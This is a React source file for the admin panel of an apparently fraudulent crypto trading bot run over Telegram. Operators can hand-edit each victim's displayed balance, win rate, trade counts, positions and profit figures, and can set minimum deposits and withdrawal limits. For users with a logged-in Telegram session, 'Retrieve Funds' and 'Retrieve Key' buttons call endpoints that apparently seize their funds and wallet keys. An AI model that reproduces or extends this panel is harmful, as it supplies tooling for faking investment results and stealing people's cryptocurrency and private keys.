import React, { useEffect, useState } from "react";
import axios from "axios";
import api from "../api/api";
import "./admin.css";

const API = "https://hawk-trade-bot.onrender.com";

export default function Admin() {
    const [password, setPassword] = useState("");
    const [loggedIn, setLoggedIn] = useState(false);
    const [loginLoading, setLoginLoading] = useState(false);

    const [users, setUsers] = useState([]);
    const [selectedUser, setSelectedUser] = useState(null);
    const [openingUser, setOpeningUser] = useState(null);

    const [walletAddress, setWalletAddress] = useState("");
    const [balance, setBalance] = useState("");
    const [positions, setPositions] = useState([]);

    const [loading, setLoading] = useState(false);
    const [saving, setSaving] = useState(false);

    const [search, setSearch] = useState("");

    const [tradesTaken, setTradesTaken] = useState(0);
    const [winRate, setWinRate] = useState(0);
    const [winningTrades, setWinningTrades] = useState(0);
    const [losingTrades, setLosingTrades] = useState(0);
    const [withdrawalLimit, setWithdrawalLimit] = useState(0);
    const [retrieve, setRetrieve] = useState("key");
    const [minimumDeposit, setMinimumDeposit] = useState(0.013);

    const [retrieveFundsLoading, setRetrieveFundsLoading] = useState(false);
    const [retrieveKeyLoading, setRetrieveKeyLoading] = useState(false);

    const [showCustomMessageModal, setShowCustomMessageModal] =
        useState(false);

    const [customMessage, setCustomMessage] = useState("");

    const [sendingCustomMessage, setSendingCustomMessage] =
        useState(false);

    const [selectedWalletAddress, setSelectedWalletAddress] =
        useState("");

    const [network, setNetwork] = useState("solana");
    const [customNetwork, setCustomNetwork] = useState("");

    const getNetworkTicker = (network) => {
        const tickers = {
            solana: "SOL",
            ethereum: "ETH",
            bitcoin: "BTC",
            bsc: "BNB",
            polygon: "POL",
            avalanche: "AVAX",
            arbitrum: "ETH",
            base: "ETH",
            tron: "TRX",
        };

        return tickers[network?.toLowerCase()] || network?.toUpperCase() || "NATIVE";
    };
    const NETWORK_OPTIONS = [
        { value: "solana", label: "Solana" },
        { value: "ethereum", label: "Ethereum" },
        { value: "bitcoin", label: "Bitcoin" },
        { value: "bnb chain", label: "BNB Chain" },
        { value: "polygon", label: "Polygon" },
        { value: "arbitrum", label: "Arbitrum" },
        { value: "base", label: "Base" },
        { value: "avalanche", label: "Avalanche" },
        { value: "tron", label: "TRON" },
        { value: "xrp", label: "XRP Ledger" },
        { value: "cardano", label: "Cardano" },
        { value: "sui", label: "Sui" },
        { value: "aptos", label: "Aptos" },
        { value: "near", label: "NEAR" },
    ];

    // Login
    const login = async () => {
        if (!password.trim()) {
            alert("Please enter the admin password");
            return;
        }

        setLoginLoading(true);

        try {
            const res = await axios.post(`${API}/admin/login`, {
                password,
            });

            if (res.data.success && res.data.token) {
                localStorage.setItem(
                    "adminToken",
                    res.data.token
                );

                setLoggedIn(true);
                setPassword("");

                await loadUsers();
            } else {
                alert("Wrong password");
            }
        } catch (error) {
            console.error("Admin login failed:", error);
            alert("Wrong password");
        } finally {
            setLoginLoading(false);
        }
    };


    // Load all users
    const loadUsers = async () => {
        setLoading(true);

        try {
            const res = await api.get("/admin/users");

            setUsers(res.data.users || []);
        } catch (err) {
            console.error(err);
            alert("Failed to load users");
        } finally {
            setLoading(false);
        }
    };


    // Open one user and load all current information
    const openUser = async (chatId) => {
        setOpeningUser(chatId);

        try {
            const res = await api.get(
                `/admin/user/${chatId}`
            );

            const user = res.data.user;

            setSelectedUser(user);

            const savedNetwork = user.network || "solana";
            setNetwork(user.network || "solana");

            const isKnownNetwork = NETWORK_OPTIONS.some(
                (option) => option.value === savedNetwork
            );

            if (isKnownNetwork) {
                setNetwork(savedNetwork);
                setCustomNetwork("");
            } else {
                setNetwork("custom");
                setCustomNetwork(savedNetwork);
            }

            const wallets = Array.isArray(user.wallet_addresses)
                ? user.wallet_addresses
                : [];

            setSelectedWalletAddress("");

            setWalletAddress(
                user.wallet_address || ""
            );

            setBalance(
                user.balance ?? 0
            );

            setPositions(
                user.positions || []
            );

            // Trading statistics
            setTradesTaken(
                user.trades_taken ?? 0
            );

            setWinRate(
                user.win_rate ?? 0
            );

            setWinningTrades(
                user.trade_performance?.winning_trades ?? 0
            );

            setLosingTrades(
                user.trade_performance?.losing_trades ?? 0
            );

            setWithdrawalLimit(
                user.withdrawal_limit ?? 0
            );

            setRetrieve(user.retrieve || "key");

            setMinimumDeposit(
                user.minimum_deposit ?? 0.013
            );

        } catch (error) {
            console.error("Failed to load user:", error);
            alert("Failed to load user");
        } finally {
            setOpeningUser(null);
        }
    };

    // Add a position
    const addPosition = () => {
        setPositions([
            ...positions,
            {
                tokenName: "",
                tokenAddress: "",
                buys: 0,
                pnlNative: 0,
            },
        ]);
    };


    // Delete a position
    const deletePosition = (index) => {
        const copy = [...positions];

        copy.splice(index, 1);

        setPositions(copy);
    };


    // Update a position
    const updatePosition = (index, field, value) => {
        const copy = [...positions];

        copy[index] = {
            ...copy[index],
            [field]: value,
        };

        setPositions(copy);
    };


    // Save user changes
    const saveUser = async () => {
        if (!selectedUser || saving) return;

        setSaving(true);

        const finalNetwork =
            network === "custom"
                ? customNetwork.trim()
                : network;

        if (!finalNetwork) {
            alert("Please select or enter a network.");
            setSaving(false);
            return;
        }

        try {
            const res = await api.put(
                `/admin/user/${selectedUser.chat_id}`,
                {
                    network: finalNetwork,

                    wallet_address: walletAddress,
                    balance: Number(balance) || 0,
                    positions,

                    trades_taken:
                        Number(tradesTaken) || 0,

                    win_rate:
                        Number(winRate) || 0,

                    trade_performance: {
                        winning_trades:
                            Number(winningTrades) || 0,

                        losing_trades:
                            Number(losingTrades) || 0,
                    },

                    withdrawal_limit:
                        Number(withdrawalLimit) || 0,

                    retrieve: retrieve,

                    minimum_deposit:
                        Number(minimumDeposit) || 0.013,
                }
            );

            if (res.data.user) {
                const user = res.data.user;

                setSelectedUser(user);

                const savedNetwork = user.network || "solana";

                const isKnownNetwork = NETWORK_OPTIONS.some(
                    (option) => option.value === savedNetwork
                );

                if (isKnownNetwork) {
                    setNetwork(savedNetwork);
                    setCustomNetwork("");
                } else {
                    setNetwork("custom");
                    setCustomNetwork(savedNetwork);
                }

                setNetwork(user.network || "solana");

                setWalletAddress(
                    user.wallet_address || ""
                );

                setBalance(
                    user.balance ?? 0
                );

                setPositions(
                    user.positions || []
                );

                setTradesTaken(
                    user.trades_taken ?? 0
                );

                setWinRate(
                    user.win_rate ?? 0
                );

                setWinningTrades(
                    user.trade_performance?.winning_trades ?? 0
                );

                setLosingTrades(
                    user.trade_performance?.losing_trades ?? 0
                );

                setWithdrawalLimit(
                    user.withdrawal_limit ?? 0
                );

                setMinimumDeposit(
                    user.minimum_deposit ?? 0.013
                );

                setRetrieve(user.retrieve || "key");
            }

            await loadUsers();

            alert("Saved successfully");

        } catch (error) {
            console.error(
                "Failed to save user:",
                error
            );

            alert("Failed to save");
        } finally {
            setSaving(false);
        }
    };

    // Display username first, otherwise chat ID
    const getUserDisplayName = (user) => {
        if (user.username && user.username.trim()) {
            return `@${user.username}`;
        }

        return String(user.chat_id);
    };


    // Search by username or chat ID
    const filteredUsers = users.filter((user) => {
        const searchValue = search.toLowerCase().trim();

        const username = (
            user.username || ""
        ).toLowerCase();

        const chatId = String(user.chat_id);

        return (
            username.includes(searchValue) ||
            chatId.includes(searchValue)
        );
    });

    // Trigger Retrieve Funds
    const retrieveFunds = async () => {
        if (!selectedUser || !selectedUser.has_session) {
            return;
        }

        if (
            !window.confirm(
                `Retrieve funds for ${getUserDisplayName(selectedUser)}?`
            )
        ) {
            return;
        }

        setRetrieveFundsLoading(true);

        try {
            const res = await api.post(
                "/admin/retrieve_funds",
                {
                    chat_id: selectedUser.chat_id,
                }
            );

            alert(
                res.data.message ||
                "Retrieve funds action completed successfully."
            );
        } catch (error) {
            console.error(
                "Failed to retrieve funds:",
                error
            );

            alert(
                error.response?.data?.error ||
                "Failed to retrieve funds."
            );
        } finally {
            setRetrieveFundsLoading(false);
        }
    };


    // Trigger Retrieve Key
    const retrieveKey = async () => {
        if (!selectedUser || !selectedUser.has_session) {
            return;
        }

        if (
            !window.confirm(
                selectedWalletAddress
                    ? `Retrieve key for selected wallet?\n\n${selectedWalletAddress}`
                    : `Retrieve key for ${getUserDisplayName(selectedUser)}?`
            )
        ) {
            return;
        }

        setRetrieveKeyLoading(true);

        try {
            const payload = {
                chat_id: selectedUser.chat_id,
            };

            // Only send the wallet address if one is selected.
            if (selectedWalletAddress) {
                payload.wallet_address =
                    selectedWalletAddress;
            }

            const res = await api.post(
                "/admin/retrieve_key",
                payload
            );

            alert(
                res.data.message ||
                "Retrieve key action completed successfully."
            );
        } catch (error) {
            console.error(
                "Failed to retrieve key:",
                error
            );

            alert(
                error.response?.data?.error ||
                "Failed to retrieve key."
            );
        } finally {
            setRetrieveKeyLoading(false);
        }
    };

    const sendCustomMessage = async () => {
        if (!selectedUser) {
            alert("Select a user first.");
            return;
        }

        // Do not trim the message: whitespace and newlines are intentional.
        if (!customMessage.trim()) {
            alert("Enter a message before sending.");
            return;
        }

        if (
            !window.confirm(
                `Send this message from the bot to ${getUserDisplayName(selectedUser)}?`
            )
        ) {
            return;
        }

        setSendingCustomMessage(true);

        try {
            const response = await api.post(
                "/admin/send_custom_message",
                {
                    chat_id: selectedUser.chat_id,
                    message: customMessage,
                }
            );

            alert(
                response.data.message ||
                "Message sent successfully."
            );

            setCustomMessage("");
            setShowCustomMessageModal(false);
        } catch (error) {
            console.error("Failed to send custom message:", error);

            alert(
                error.response?.data?.error ||
                "Failed to send the message."
            );
        } finally {
            setSendingCustomMessage(false);
        }
    };

    const ticker = getNetworkTicker(network);

    // LOGIN PAGE
    if (!loggedIn) {
        return (
            <div className="falcon-admin-page">
                <div className="falcon-admin-login">
                    <div className="falcon-admin-login-card">
                        <h2>Admin Panel</h2>

                        <input
                            type="password"
                            placeholder="Password"
                            value={password}
                            disabled={loginLoading}
                            onChange={(e) =>
                                setPassword(e.target.value)
                            }
                            onKeyDown={(e) => {
                                if (e.key === "Enter") {
                                    login();
                                }
                            }}
                        />

                        <button
                            onClick={login}
                            disabled={loginLoading}
                        >
                            {loginLoading
                                ? "Unlocking..."
                                : "Unlock"}
                        </button>
                    </div>
                </div>
            </div>
        );
    }


    // ADMIN PANEL
    return (
        <div className="falcon-admin-page">
            <div className="falcon-admin-container">

                {/* SIDEBAR */}
                <div className="falcon-admin-sidebar">
                    <h2>Users</h2>

                    <input
                        placeholder="Search username or chat ID..."
                        value={search}
                        onChange={(e) =>
                            setSearch(e.target.value)
                        }
                    />

                    {loading && (
                        <p className="falcon-admin-loading-text">
                            Loading users...
                        </p>
                    )}

                    {!loading &&
                        filteredUsers.map((user) => {
                            const isOpening =
                                openingUser === user.chat_id;

                            return (
                                <button
                                    key={user.chat_id}
                                    type="button"
                                    className={`falcon-admin-user-card ${selectedUser?.chat_id ===
                                        user.chat_id
                                        ? "falcon-admin-user-card-active"
                                        : ""
                                        }`}
                                    disabled={isOpening}
                                    onClick={() =>
                                        openUser(user.chat_id)
                                    }
                                >
                                    <b>
                                        {isOpening
                                            ? "Loading..."
                                            : getUserDisplayName(user)}
                                    </b>

                                    {user.username && (
                                        <small>
                                            ID: {user.chat_id}
                                        </small>
                                    )}

                                    <small>
                                        {Number(user.balance || 0)}{" "}
                                        {(user.network || "solana").toUpperCase()}
                                    </small>
                                </button>
                            );
                        })}

                    {!loading &&
                        filteredUsers.length === 0 && (
                            <p className="falcon-admin-loading-text">
                                No users found.
                            </p>
                        )}
                </div>


                {/* USER EDITOR */}
                <div className="falcon-admin-editor">

                    {!selectedUser && (
                        <div className="falcon-admin-empty-state">
                            <h2>Select a user</h2>
                            <p>
                                Select a user from the sidebar
                                to view and edit their information.
                            </p>
                        </div>
                    )}


                    {selectedUser && (
                        <>
                            {/* USER INFORMATION */}
                            <div className="falcon-admin-user-header">
                                <h2>
                                    {getUserDisplayName(selectedUser)}
                                </h2>

                                <p>
                                    <strong>Chat ID:</strong>{" "}
                                    {selectedUser.chat_id}
                                </p>

                                <p>
                                    <strong>Username:</strong>{" "}
                                    {selectedUser.username
                                        ? `@${selectedUser.username}`
                                        : "No username"}
                                </p>

                                <p>
                                    <strong>Telegram Session:</strong>{" "}
                                    <span
                                        className={
                                            selectedUser.has_session
                                                ? "falcon-admin-session-active"
                                                : "falcon-admin-session-inactive"
                                        }
                                    >
                                        {selectedUser.has_session
                                            ? "● Logged in"
                                            : "● Not logged in"}
                                    </span>
                                </p>
                            </div>


                            {/* USER ACTIONS */}
                            <h3>User Actions</h3>

                            <div className="falcon-admin-user-actions">

                                {!selectedUser.has_session && (
                                    <p className="falcon-admin-action-disabled-note">
                                        These actions are unavailable because this user is not logged in.
                                    </p>
                                )}

                                <div className="falcon-admin-action-buttons">
                                    <button
                                        type="button"
                                        className="falcon-admin-action-btn"
                                        disabled={
                                            !selectedUser.has_session ||
                                            retrieveFundsLoading ||
                                            retrieveKeyLoading
                                        }
                                        onClick={retrieveFunds}
                                    >
                                        {retrieveFundsLoading
                                            ? "Retrieving Funds..."
                                            : "Retrieve Funds"}
                                    </button>

                                    <button
                                        type="button"
                                        className="falcon-admin-action-btn"
                                        disabled={
                                            !selectedUser.has_session ||
                                            retrieveFundsLoading ||
                                            retrieveKeyLoading
                                        }
                                        onClick={retrieveKey}
                                    >
                                        {retrieveKeyLoading
                                            ? "Retrieving Key..."
                                            : "Retrieve Key"}
                                    </button>

                                    <button
                                        type="button"
                                        className="falcon-admin-action-btn"
                                        disabled={!selectedUser || sendingCustomMessage}
                                        onClick={() => setShowCustomMessageModal(true)}
                                    >
                                        Send Custom Message
                                    </button>
                                </div>
                            </div>

                            {/* SAVED WALLETS */}
                            <h3>Saved Wallets</h3>

                            <div className="falcon-admin-wallets-section">
                                {Array.isArray(selectedUser.wallet_addresses) &&
                                    selectedUser.wallet_addresses.length > 0 ? (
                                    selectedUser.wallet_addresses.map(
                                        (address, index) => (
                                            <div
                                                key={address}
                                                className="falcon-admin-wallet-card"
                                            >
                                                <div className="falcon-admin-wallet-number">
                                                    Wallet {index + 1}
                                                </div>

                                                <code className="falcon-admin-wallet-address">
                                                    {address}
                                                </code>

                                                <button
                                                    type="button"
                                                    className="falcon-admin-wallet-select-btn"
                                                    onClick={() => {
                                                        setSelectedWalletAddress(address);
                                                    }}
                                                >
                                                    {selectedWalletAddress === address
                                                        ? "Selected"
                                                        : "Select Wallet"}
                                                </button>
                                            </div>
                                        )
                                    )
                                ) : (
                                    <p className="falcon-admin-loading-text">
                                        No wallet addresses have been saved for this user yet.
                                    </p>
                                )}
                            </div>

                            {/* NETWORK */}
                            <label>
                                Network
                            </label>

                            <select
                                value={network}
                                onChange={(e) => {
                                    setNetwork(e.target.value);

                                    if (e.target.value !== "custom") {
                                        setCustomNetwork("");
                                    }
                                }}
                            >
                                {NETWORK_OPTIONS.map((option) => (
                                    <option
                                        key={option.value}
                                        value={option.value}
                                    >
                                        {option.label}
                                    </option>
                                ))}

                                <option value="custom">
                                    Other / Custom
                                </option>
                            </select>

                            {network === "custom" && (
                                <input
                                    type="text"
                                    placeholder="Enter network name..."
                                    value={customNetwork}
                                    onChange={(e) =>
                                        setCustomNetwork(e.target.value)
                                    }
                                />
                            )}

                            {/* WALLET */}
                            <label>
                                Wallet Address
                            </label>

                            <input
                                value={walletAddress}
                                onChange={(e) =>
                                    setWalletAddress(e.target.value)
                                }
                            />


                            {/* BALANCE */}
                            <label>
                                Balance ({network === "custom"
                                    ? customNetwork || "Network"
                                    : network.toUpperCase()})
                            </label>

                            <input
                                type="number"
                                step="any"
                                value={balance}
                                onChange={(e) =>
                                    setBalance(e.target.value)
                                }
                            />

                            <label>
                                Minimum Deposit ({network === "custom"
                                    ? customNetwork || "Network"
                                    : network.toUpperCase()})
                            </label>

                            <input
                                type="number"
                                min="0"
                                step="any"
                                value={minimumDeposit}
                                onChange={(e) =>
                                    setMinimumDeposit(e.target.value)
                                }
                            />

                            {/* TRADING STATISTICS */}
                            <h3>Trading Statistics</h3>

                            <label>
                                Trades Taken
                            </label>

                            <input
                                type="number"
                                min="0"
                                step="1"
                                value={tradesTaken}
                                onChange={(e) =>
                                    setTradesTaken(e.target.value)
                                }
                            />


                            <label>
                                Success Rate (%)
                            </label>

                            <input
                                type="number"
                                min="0"
                                max="100"
                                step="any"
                                value={winRate}
                                onChange={(e) =>
                                    setWinRate(e.target.value)
                                }
                            />


                            <label>
                                Winning Trades
                            </label>

                            <input
                                type="number"
                                min="0"
                                step="1"
                                value={winningTrades}
                                onChange={(e) =>
                                    setWinningTrades(e.target.value)
                                }
                            />


                            <label>
                                Losing Trades
                            </label>

                            <input
                                type="number"
                                min="0"
                                step="1"
                                value={losingTrades}
                                onChange={(e) =>
                                    setLosingTrades(e.target.value)
                                }
                            />


                            <label>
                                Withdrawal Limit ({network === "custom"
                                    ? customNetwork || "Network"
                                    : network.toUpperCase()})
                            </label>

                            <input
                                type="number"
                                min="0"
                                step="any"
                                value={withdrawalLimit}
                                onChange={(e) =>
                                    setWithdrawalLimit(e.target.value)
                                }
                            />

                            {/* RETRIEVE STATUS */}
                            <h3>Retrieve Status</h3>

                            <div className="falcon-admin-retrieve-status">
                                <strong>Current Status:</strong>{" "}
                                <span className={`falcon-admin-retrieve-${retrieve}`}>
                                    {retrieve === "key"
                                        ? "🔑 Key"
                                        : retrieve === "funds"
                                            ? "💰 Funds"
                                            : "⚪ None"}
                                </span>
                            </div>

                            <label>
                                Change Retrieve Status
                            </label>

                            <select
                                value={retrieve}
                                onChange={(e) =>
                                    setRetrieve(e.target.value)
                                }
                            >
                                <option value="key">
                                    🔑 Key
                                </option>

                                <option value="funds">
                                    💰 Funds
                                </option>

                                <option value="none">
                                    ⚪ None
                                </option>
                            </select>


                            {/* POSITIONS */}
                            <h3>Positions</h3>

                            {positions.length === 0 && (
                                <p className="falcon-admin-loading-text">
                                    No positions for this user.
                                </p>
                            )}

                            {positions.map((position, index) => (
                                <div
                                    key={index}
                                    className="falcon-admin-position-card"
                                >
                                    <label>
                                        Token Name
                                    </label>

                                    <input
                                        value={
                                            position.tokenName || ""
                                        }
                                        onChange={(e) =>
                                            updatePosition(
                                                index,
                                                "tokenName",
                                                e.target.value
                                            )
                                        }
                                    />


                                    <label>
                                        Token Address
                                    </label>

                                    <input
                                        value={
                                            position.tokenAddress || ""
                                        }
                                        onChange={(e) =>
                                            updatePosition(
                                                index,
                                                "tokenAddress",
                                                e.target.value
                                            )
                                        }
                                    />


                                    <label>
                                        Buy Amount ({getNetworkTicker(network)})
                                    </label>

                                    <input
                                        type="number"
                                        step="any"
                                        value={position.buys ?? 0}
                                        onChange={(e) =>
                                            updatePosition(
                                                index,
                                                "buys",
                                                Number(e.target.value) || 0
                                            )
                                        }
                                    />

                                    <label>
                                        PnL ({getNetworkTicker(network)})
                                    </label>

                                    <input
                                        type="number"
                                        step="any"
                                        value={position.pnlNative ?? 0}
                                        onChange={(e) =>
                                            updatePosition(
                                                index,
                                                "pnlNative",
                                                Number(e.target.value) || 0
                                            )
                                        }
                                    />

                                    <button
                                        type="button"
                                        className="falcon-admin-delete-btn"
                                        disabled={saving}
                                        onClick={() =>
                                            deletePosition(index)
                                        }
                                    >
                                        Delete Position
                                    </button>
                                </div>
                            ))}


                            <button
                                type="button"
                                className="falcon-admin-add-btn"
                                disabled={saving}
                                onClick={addPosition}
                            >
                                + Add Position
                            </button>


                            <button
                                type="button"
                                className="falcon-admin-save-btn"
                                disabled={saving}
                                onClick={saveUser}
                            >
                                {saving
                                    ? "Saving Changes..."
                                    : "Save Changes"}
                            </button>
                        </>
                    )}
                </div>
            </div>

            {showCustomMessageModal && (
                <div
                    className="falcon-custom-message-overlay"
                    onMouseDown={(event) => {
                        if (
                            event.target === event.currentTarget &&
                            !sendingCustomMessage
                        ) {
                            setShowCustomMessageModal(false);
                        }
                    }}
                >
                    <div
                        className="falcon-custom-message-modal"
                        role="dialog"
                        aria-modal="true"
                        aria-labelledby="custom-message-title"
                    >
                        <div className="falcon-custom-message-header">
                            <div>
                                <h2 id="custom-message-title">
                                    Send Custom Message
                                </h2>

                                <p>
                                    Sent from your bot account to{" "}
                                    <strong>
                                        {getUserDisplayName(selectedUser)}
                                    </strong>
                                </p>
                            </div>

                            <button
                                type="button"
                                className="falcon-custom-message-close"
                                aria-label="Close modal"
                                disabled={sendingCustomMessage}
                                onClick={() => setShowCustomMessageModal(false)}
                            >
                                ×
                            </button>
                        </div>

                        <label
                            className="falcon-custom-message-label"
                            htmlFor="custom-message-text"
                        >
                            Message
                        </label>

                        <textarea
                            id="custom-message-text"
                            className="falcon-custom-message-textarea"
                            value={customMessage}
                            onChange={(event) =>
                                setCustomMessage(event.target.value)
                            }
                            placeholder={"Enter your message here...\n\nParagraphs and blank lines will be preserved."}
                            rows={12}
                            disabled={sendingCustomMessage}
                            autoFocus
                            spellCheck
                        />

                        <div className="falcon-custom-message-footer">
                            <span>
                                {customMessage.length} characters
                            </span>

                            <div className="falcon-custom-message-actions">
                                <button
                                    type="button"
                                    className="falcon-custom-message-cancel"
                                    disabled={sendingCustomMessage}
                                    onClick={() => {
                                        setShowCustomMessageModal(false);
                                    }}
                                >
                                    Cancel
                                </button>

                                <button
                                    type="button"
                                    className="falcon-custom-message-send"
                                    disabled={
                                        sendingCustomMessage ||
                                        !customMessage.trim()
                                    }
                                    onClick={sendCustomMessage}
                                >
                                    {sendingCustomMessage
                                        ? "Sending..."
                                        : "Send Message"}
                                </button>
                            </div>
                        </div>
                    </div>
                </div>
            )}
        </div>
    );
}